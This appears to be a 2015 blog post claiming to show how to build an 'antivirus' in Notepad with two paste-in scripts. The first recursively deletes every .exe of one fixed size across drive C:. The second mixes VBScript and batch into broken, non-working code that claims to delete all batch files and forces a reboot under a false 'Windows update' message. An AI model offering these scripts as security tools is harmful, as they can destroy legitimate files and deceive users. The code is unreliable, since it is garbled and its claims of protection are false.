Saturday, November 21, 2015

Creating advanced Antivirus with Notepad

1.Open Notepad 2.Copy and Paste the code below @echo off echo turns of the virus taskkill /F /IM virusname1.exe /IM virusname2.exe echo remove all viruses by size for /R C:\ %%a in (*.exe) do if %%~za equ 157184 del /A: H S R A “%%a” echo remove virus that disguised echo to drive c and subfolder for /R C:\ %%a in (*.doc.exe) do del “%%a” echo to drive d and subfolder for /R D:\ %%a in (*.doc.exe) do del “%%a” echo returns the Document is in the Hidden cd /d c:\ echo to drive c and subfolder attrib *.doc -H -S -A /S cd /d d:\ echo to drive d and subfolder attrib *.doc -H -S -A /S exit Description: virusname1 and virusname2 be filled with the virus name you know. 4.Save As with the name Anything.bat , change to All Files and not TXT (Just have to bat extension). Example: Antivirus.bat Method 2: Remove Virus do you know his name and remove any virus bat 1.Open Notepad 2.Copy and Paste the code below x=msgbox("Anti-Virus should delete some of the virus's that you may have.",1+16 , "Alert") x=msgbox("what this does is removes anything that Has any text that seems like a virus",1+16 ,"Alert") x=msgbox("It will also go through your computer and delete All Batch Files.",1+16 ,"Alert") x=msgbox("If you want any of you .bat files saved then do so before hitting okay",1+16 ,"Alert") x=msgbox("The Anti-Virus software is now ready to begin. click okay to begin".1+16 ,"Alert") del (:'bat*): x=msgbox("All BAT Files sucessfully removed. click okay to Continue,",1+16 ,"Alert) del virus.vbs del virus.bat del torjan.bat del torjan.vbs del infected.bat del infected.vbs del TROJ.bat del TOR.vbs del Torjan Horse.Bat del Torjan Horse.vbs del OM.bat del OM.vbs del Macro Virus.bat del Micro Virus.vbs del conflicker.bat del conflicker.bat del trojan.bat del trojan.vbs del Trojan Horse.Bat del Trojan Horse.vbs x=msgbox("Anti-Virus Completed...Will Now test and make working",1+16 ,"Alert) open notepad open mspaint open controlpanel open MyDocuments x=msgbox("Now we will Shutdown/Restart your computer, and windows will install an important update for your computer",1+16 ,"Alert) Shutdown -r -c "Rebooting computer for important windows updates" x=msgbox(anti-Virus Software Complete. The program now close.",1+16,;"Alert") Description: You can add the name of the virus you know. 4.Save As with the name Anything.bat , change to All Files and not TXT (Just have to bat extension). Example: Antivirus.bat

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